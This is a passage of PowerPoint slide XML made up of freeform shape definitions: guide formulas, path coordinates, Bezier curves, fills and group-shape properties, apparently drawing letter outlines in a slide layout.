                  <a:gd name="T22" fmla="*/ 146 w 354"/>
                  <a:gd name="T23" fmla="*/ 53 h 434"/>
                  <a:gd name="T24" fmla="*/ 112 w 354"/>
                  <a:gd name="T25" fmla="*/ 80 h 434"/>
                  <a:gd name="T26" fmla="*/ 91 w 354"/>
                  <a:gd name="T27" fmla="*/ 130 h 434"/>
                  <a:gd name="T28" fmla="*/ 55 w 354"/>
                  <a:gd name="T29" fmla="*/ 278 h 434"/>
                  <a:gd name="T30" fmla="*/ 46 w 354"/>
                  <a:gd name="T31" fmla="*/ 328 h 434"/>
                  <a:gd name="T32" fmla="*/ 47 w 354"/>
                  <a:gd name="T33" fmla="*/ 363 h 434"/>
                  <a:gd name="T34" fmla="*/ 65 w 354"/>
                  <a:gd name="T35" fmla="*/ 385 h 434"/>
                  <a:gd name="T36" fmla="*/ 101 w 354"/>
                  <a:gd name="T37" fmla="*/ 391 h 434"/>
                  <a:gd name="T38" fmla="*/ 178 w 354"/>
                  <a:gd name="T39" fmla="*/ 391 h 434"/>
                  <a:gd name="T40" fmla="*/ 219 w 354"/>
                  <a:gd name="T41" fmla="*/ 379 h 434"/>
                  <a:gd name="T42" fmla="*/ 244 w 354"/>
                  <a:gd name="T43" fmla="*/ 346 h 434"/>
                  <a:gd name="T44" fmla="*/ 260 w 354"/>
                  <a:gd name="T45" fmla="*/ 294 h 434"/>
                  <a:gd name="T46" fmla="*/ 294 w 354"/>
                  <a:gd name="T47" fmla="*/ 325 h 434"/>
                  <a:gd name="T48" fmla="*/ 270 w 354"/>
                  <a:gd name="T49" fmla="*/ 383 h 434"/>
                  <a:gd name="T50" fmla="*/ 235 w 354"/>
                  <a:gd name="T51" fmla="*/ 416 h 434"/>
                  <a:gd name="T52" fmla="*/ 191 w 354"/>
                  <a:gd name="T53" fmla="*/ 431 h 434"/>
                  <a:gd name="T54" fmla="*/ 138 w 354"/>
                  <a:gd name="T55" fmla="*/ 434 h 434"/>
                  <a:gd name="T56" fmla="*/ 56 w 354"/>
                  <a:gd name="T57" fmla="*/ 431 h 434"/>
                  <a:gd name="T58" fmla="*/ 18 w 354"/>
                  <a:gd name="T59" fmla="*/ 409 h 434"/>
                  <a:gd name="T60" fmla="*/ 0 w 354"/>
                  <a:gd name="T61" fmla="*/ 364 h 434"/>
                  <a:gd name="T62" fmla="*/ 6 w 354"/>
                  <a:gd name="T63" fmla="*/ 300 h 434"/>
                  <a:gd name="T64" fmla="*/ 60 w 354"/>
                  <a:gd name="T65" fmla="*/ 96 h 434"/>
                  <a:gd name="T66" fmla="*/ 90 w 354"/>
                  <a:gd name="T67" fmla="*/ 46 h 434"/>
                  <a:gd name="T68" fmla="*/ 131 w 354"/>
                  <a:gd name="T69" fmla="*/ 16 h 434"/>
                  <a:gd name="T70" fmla="*/ 181 w 354"/>
                  <a:gd name="T71" fmla="*/ 2 h 434"/>
                  <a:gd name="T72" fmla="*/ 238 w 354"/>
                  <a:gd name="T73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54" h="434">
                    <a:moveTo>
                      <a:pt x="238" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="242" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="9292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371" name="Freeform 18">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F86E1BA3-C448-6D41-BD73-40524BFEB4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32400" y="1114425"/>
                <a:ext cx="200025" cy="227013"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 142 w 377"/>
                  <a:gd name="T1" fmla="*/ 44 h 428"/>
                  <a:gd name="T2" fmla="*/ 98 w 377"/>
                  <a:gd name="T3" fmla="*/ 213 h 428"/>
                  <a:gd name="T4" fmla="*/ 230 w 377"/>
                  <a:gd name="T5" fmla="*/ 213 h 428"/>
                  <a:gd name="T6" fmla="*/ 255 w 377"/>
                  <a:gd name="T7" fmla="*/ 210 h 428"/>
                  <a:gd name="T8" fmla="*/ 276 w 377"/>
                  <a:gd name="T9" fmla="*/ 206 h 428"/>
                  <a:gd name="T10" fmla="*/ 291 w 377"/>
                  <a:gd name="T11" fmla="*/ 197 h 428"/>
                  <a:gd name="T12" fmla="*/ 304 w 377"/>
                  <a:gd name="T13" fmla="*/ 184 h 428"/>
                  <a:gd name="T14" fmla="*/ 313 w 377"/>
                  <a:gd name="T15" fmla="*/ 167 h 428"/>
                  <a:gd name="T16" fmla="*/ 321 w 377"/>
                  <a:gd name="T17" fmla="*/ 145 h 428"/>
                  <a:gd name="T18" fmla="*/ 329 w 377"/>
                  <a:gd name="T19" fmla="*/ 118 h 428"/>
                  <a:gd name="T20" fmla="*/ 335 w 377"/>
                  <a:gd name="T21" fmla="*/ 96 h 428"/>
                  <a:gd name="T22" fmla="*/ 336 w 377"/>
                  <a:gd name="T23" fmla="*/ 78 h 428"/>
                  <a:gd name="T24" fmla="*/ 333 w 377"/>
                  <a:gd name="T25" fmla="*/ 63 h 428"/>
                  <a:gd name="T26" fmla="*/ 327 w 377"/>
                  <a:gd name="T27" fmla="*/ 54 h 428"/>
                  <a:gd name="T28" fmla="*/ 316 w 377"/>
                  <a:gd name="T29" fmla="*/ 48 h 428"/>
                  <a:gd name="T30" fmla="*/ 298 w 377"/>
                  <a:gd name="T31" fmla="*/ 45 h 428"/>
                  <a:gd name="T32" fmla="*/ 274 w 377"/>
                  <a:gd name="T33" fmla="*/ 44 h 428"/>
                  <a:gd name="T34" fmla="*/ 142 w 377"/>
                  <a:gd name="T35" fmla="*/ 44 h 428"/>
                  <a:gd name="T36" fmla="*/ 112 w 377"/>
                  <a:gd name="T37" fmla="*/ 0 h 428"/>
                  <a:gd name="T38" fmla="*/ 285 w 377"/>
                  <a:gd name="T39" fmla="*/ 0 h 428"/>
                  <a:gd name="T40" fmla="*/ 286 w 377"/>
                  <a:gd name="T41" fmla="*/ 0 h 428"/>
                  <a:gd name="T42" fmla="*/ 313 w 377"/>
                  <a:gd name="T43" fmla="*/ 2 h 428"/>
                  <a:gd name="T44" fmla="*/ 335 w 377"/>
                  <a:gd name="T45" fmla="*/ 6 h 428"/>
                  <a:gd name="T46" fmla="*/ 352 w 377"/>
                  <a:gd name="T47" fmla="*/ 14 h 428"/>
                  <a:gd name="T48" fmla="*/ 365 w 377"/>
                  <a:gd name="T49" fmla="*/ 26 h 428"/>
                  <a:gd name="T50" fmla="*/ 374 w 377"/>
                  <a:gd name="T51" fmla="*/ 41 h 428"/>
                  <a:gd name="T52" fmla="*/ 377 w 377"/>
                  <a:gd name="T53" fmla="*/ 61 h 428"/>
                  <a:gd name="T54" fmla="*/ 377 w 377"/>
                  <a:gd name="T55" fmla="*/ 87 h 428"/>
                  <a:gd name="T56" fmla="*/ 371 w 377"/>
                  <a:gd name="T57" fmla="*/ 120 h 428"/>
                  <a:gd name="T58" fmla="*/ 370 w 377"/>
                  <a:gd name="T59" fmla="*/ 122 h 428"/>
                  <a:gd name="T60" fmla="*/ 370 w 377"/>
                  <a:gd name="T61" fmla="*/ 122 h 428"/>
                  <a:gd name="T62" fmla="*/ 370 w 377"/>
                  <a:gd name="T63" fmla="*/ 124 h 428"/>
                  <a:gd name="T64" fmla="*/ 370 w 377"/>
                  <a:gd name="T65" fmla="*/ 127 h 428"/>
                  <a:gd name="T66" fmla="*/ 370 w 377"/>
                  <a:gd name="T67" fmla="*/ 127 h 428"/>
                  <a:gd name="T68" fmla="*/ 362 w 377"/>
                  <a:gd name="T69" fmla="*/ 151 h 428"/>
                  <a:gd name="T70" fmla="*/ 355 w 377"/>
                  <a:gd name="T71" fmla="*/ 172 h 428"/>
                  <a:gd name="T72" fmla="*/ 345 w 377"/>
                  <a:gd name="T73" fmla="*/ 191 h 428"/>
                  <a:gd name="T74" fmla="*/ 333 w 377"/>
                  <a:gd name="T75" fmla="*/ 207 h 428"/>
                  <a:gd name="T76" fmla="*/ 318 w 377"/>
                  <a:gd name="T77" fmla="*/ 219 h 428"/>
                  <a:gd name="T78" fmla="*/ 299 w 377"/>
                  <a:gd name="T79" fmla="*/ 230 h 428"/>
                  <a:gd name="T80" fmla="*/ 276 w 377"/>
                  <a:gd name="T81" fmla="*/ 234 h 428"/>
                  <a:gd name="T82" fmla="*/ 274 w 377"/>
                  <a:gd name="T83" fmla="*/ 236 h 428"/>
                  <a:gd name="T84" fmla="*/ 294 w 377"/>
                  <a:gd name="T85" fmla="*/ 240 h 428"/>
                  <a:gd name="T86" fmla="*/ 307 w 377"/>
                  <a:gd name="T87" fmla="*/ 247 h 428"/>
                  <a:gd name="T88" fmla="*/ 316 w 377"/>
                  <a:gd name="T89" fmla="*/ 258 h 428"/>
                  <a:gd name="T90" fmla="*/ 320 w 377"/>
                  <a:gd name="T91" fmla="*/ 273 h 428"/>
                  <a:gd name="T92" fmla="*/ 320 w 377"/>
                  <a:gd name="T93" fmla="*/ 291 h 428"/>
                  <a:gd name="T94" fmla="*/ 316 w 377"/>
                  <a:gd name="T95" fmla="*/ 311 h 428"/>
                  <a:gd name="T96" fmla="*/ 285 w 377"/>
                  <a:gd name="T97" fmla="*/ 428 h 428"/>
                  <a:gd name="T98" fmla="*/ 242 w 377"/>
                  <a:gd name="T99" fmla="*/ 428 h 428"/>
                  <a:gd name="T100" fmla="*/ 267 w 377"/>
                  <a:gd name="T101" fmla="*/ 335 h 428"/>
                  <a:gd name="T102" fmla="*/ 272 w 377"/>
                  <a:gd name="T103" fmla="*/ 313 h 428"/>
                  <a:gd name="T104" fmla="*/ 274 w 377"/>
                  <a:gd name="T105" fmla="*/ 295 h 428"/>
                  <a:gd name="T106" fmla="*/ 273 w 377"/>
                  <a:gd name="T107" fmla="*/ 280 h 428"/>
                  <a:gd name="T108" fmla="*/ 267 w 377"/>
                  <a:gd name="T109" fmla="*/ 270 h 428"/>
                  <a:gd name="T110" fmla="*/ 258 w 377"/>
                  <a:gd name="T111" fmla="*/ 261 h 428"/>
                  <a:gd name="T112" fmla="*/ 244 w 377"/>
                  <a:gd name="T113" fmla="*/ 256 h 428"/>
                  <a:gd name="T114" fmla="*/ 225 w 377"/>
                  <a:gd name="T115" fmla="*/ 255 h 428"/>
                  <a:gd name="T116" fmla="*/ 88 w 377"/>
                  <a:gd name="T117" fmla="*/ 255 h 428"/>
                  <a:gd name="T118" fmla="*/ 43 w 377"/>
                  <a:gd name="T119" fmla="*/ 428 h 428"/>
                  <a:gd name="T120" fmla="*/ 0 w 377"/>
                  <a:gd name="T121" fmla="*/ 428 h 428"/>
                  <a:gd name="T122" fmla="*/ 112 w 377"/>
                  <a:gd name="T123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77" h="428">
                    <a:moveTo>
                      <a:pt x="142" y="44"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="98" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="335" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="333" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="44"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="112" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="285" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="335" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="333" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="428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92929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333" name="그룹 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38A33D86-4A53-E542-9873-942545EBF35F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4149020" y="2932184"/>
              <a:ext cx="1170461" cy="78613"/>
              <a:chOff x="4116353" y="2247256"/>
              <a:chExt cx="1395944" cy="93757"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="334" name="Freeform 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBD0377E-5A5E-234F-845D-1DF7782CF1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16353" y="2271563"/>
                <a:ext cx="45141" cy="52089"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 21"/>
                  <a:gd name="T1" fmla="*/ 12 h 25"/>
                  <a:gd name="T2" fmla="*/ 11 w 21"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 21 w 21"/>
                  <a:gd name="T5" fmla="*/ 11 h 25"/>
                  <a:gd name="T6" fmla="*/ 20 w 21"/>
                  <a:gd name="T7" fmla="*/ 13 h 25"/>
                  <a:gd name="T8" fmla="*/ 4 w 21"/>
                  <a:gd name="T9" fmla="*/ 13 h 25"/>
                  <a:gd name="T10" fmla="*/ 12 w 21"/>
                  <a:gd name="T11" fmla="*/ 21 h 25"/>
                  <a:gd name="T12" fmla="*/ 18 w 21"/>
                  <a:gd name="T13" fmla="*/ 20 h 25"/>
                  <a:gd name="T14" fmla="*/ 20 w 21"/>
                  <a:gd name="T15" fmla="*/ 22 h 25"/>
                  <a:gd name="T16" fmla="*/ 12 w 21"/>
                  <a:gd name="T17" fmla="*/ 25 h 25"/>
                  <a:gd name="T18" fmla="*/ 0 w 21"/>
                  <a:gd name="T19" fmla="*/ 12 h 25"/>
                  <a:gd name="T20" fmla="*/ 17 w 21"/>
                  <a:gd name="T21" fmla="*/ 10 h 25"/>
                  <a:gd name="T22" fmla="*/ 11 w 21"/>
                  <a:gd name="T23" fmla="*/ 3 h 25"/>
                  <a:gd name="T24" fmla="*/ 4 w 21"/>
                  <a:gd name="T25" fmla="*/ 10 h 25"/>
                  <a:gd name="T26" fmla="*/ 17 w 21"/>
                  <a:gd name="T27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5">
                    <a:moveTo>
                      <a:pt x="0" y="12"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="5"/>
                      <a:pt x="6" y="0"/>
                      <a:pt x="11" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="0"/>
                      <a:pt x="21" y="4"/>
                      <a:pt x="21" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="12"/>
                      <a:pt x="20" y="13"/>
                      <a:pt x="20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5" y="18"/>
                      <a:pt x="8" y="21"/>
                      <a:pt x="12" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="21"/>
                      <a:pt x="16" y="21"/>
                      <a:pt x="18" y="20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8" y="23"/>
                      <a:pt x="15" y="25"/>
                      <a:pt x="12" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="25"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="0" y="12"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="17" y="10"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="5"/>
                      <a:pt x="15" y="3"/>
                      <a:pt x="11" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="3"/>
                      <a:pt x="5" y="6"/>
                      <a:pt x="4" y="10"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1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5" name="Freeform 47">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB642CF8-CC5C-5E4E-8F99-11087475D6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2329" y="2271563"/>
                <a:ext cx="38196" cy="48615"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 18"/>
                  <a:gd name="T1" fmla="*/ 0 h 24"/>
                  <a:gd name="T2" fmla="*/ 3 w 18"/>
                  <a:gd name="T3" fmla="*/ 0 h 24"/>
                  <a:gd name="T4" fmla="*/ 3 w 18"/>
                  <a:gd name="T5" fmla="*/ 4 h 24"/>
                  <a:gd name="T6" fmla="*/ 3 w 18"/>
                  <a:gd name="T7" fmla="*/ 4 h 24"/>
                  <a:gd name="T8" fmla="*/ 11 w 18"/>
                  <a:gd name="T9" fmla="*/ 0 h 24"/>
                  <a:gd name="T10" fmla="*/ 18 w 18"/>
                  <a:gd name="T11" fmla="*/ 9 h 24"/>
                  <a:gd name="T12" fmla="*/ 18 w 18"/>
                  <a:gd name="T13" fmla="*/ 24 h 24"/>
                  <a:gd name="T14" fmla="*/ 14 w 18"/>
                  <a:gd name="T15" fmla="*/ 24 h 24"/>
                  <a:gd name="T16" fmla="*/ 14 w 18"/>
                  <a:gd name="T17" fmla="*/ 10 h 24"/>
                  <a:gd name="T18" fmla="*/ 10 w 18"/>
                  <a:gd name="T19" fmla="*/ 3 h 24"/>
                  <a:gd name="T20" fmla="*/ 3 w 18"/>
                  <a:gd name="T21" fmla="*/ 7 h 24"/>
                  <a:gd name="T22" fmla="*/ 3 w 18"/>
                  <a:gd name="T23" fmla="*/ 24 h 24"/>
                  <a:gd name="T24" fmla="*/ 0 w 18"/>
                  <a:gd name="T25" fmla="*/ 24 h 24"/>
                  <a:gd name="T26" fmla="*/ 0 w 18"/>
                  <a:gd name="T2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24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6" y="2"/>
                      <a:pt x="8" y="0"/>
                      <a:pt x="11" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="0"/>
                      <a:pt x="18" y="3"/>
                      <a:pt x="18" y="9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5"/>
                      <a:pt x="13" y="3"/>
                      <a:pt x="10" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="3"/>
                      <a:pt x="6" y="4"/>
                      <a:pt x="3" y="7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6" name="Freeform 48">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6196B8F-9307-7F40-AC6B-0B67999EAE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1363" y="2257673"/>
                <a:ext cx="31251" cy="65979"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 15"/>
                  <a:gd name="T1" fmla="*/ 23 h 31"/>
                  <a:gd name="T2" fmla="*/ 3 w 15"/>
                  <a:gd name="T3" fmla="*/ 10 h 31"/>
                  <a:gd name="T4" fmla="*/ 0 w 15"/>
                  <a:gd name="T5" fmla="*/ 10 h 31"/>
                  <a:gd name="T6" fmla="*/ 0 w 15"/>
                  <a:gd name="T7" fmla="*/ 7 h 31"/>
                  <a:gd name="T8" fmla="*/ 4 w 15"/>
                  <a:gd name="T9" fmla="*/ 6 h 31"/>
                  <a:gd name="T10" fmla="*/ 4 w 15"/>
                  <a:gd name="T11" fmla="*/ 0 h 31"/>
                  <a:gd name="T12" fmla="*/ 7 w 15"/>
                  <a:gd name="T13" fmla="*/ 0 h 31"/>
                  <a:gd name="T14" fmla="*/ 7 w 15"/>
                  <a:gd name="T15" fmla="*/ 6 h 31"/>
                  <a:gd name="T16" fmla="*/ 14 w 15"/>
                  <a:gd name="T17" fmla="*/ 6 h 31"/>
                  <a:gd name="T18" fmla="*/ 14 w 15"/>
                  <a:gd name="T19" fmla="*/ 10 h 31"/>
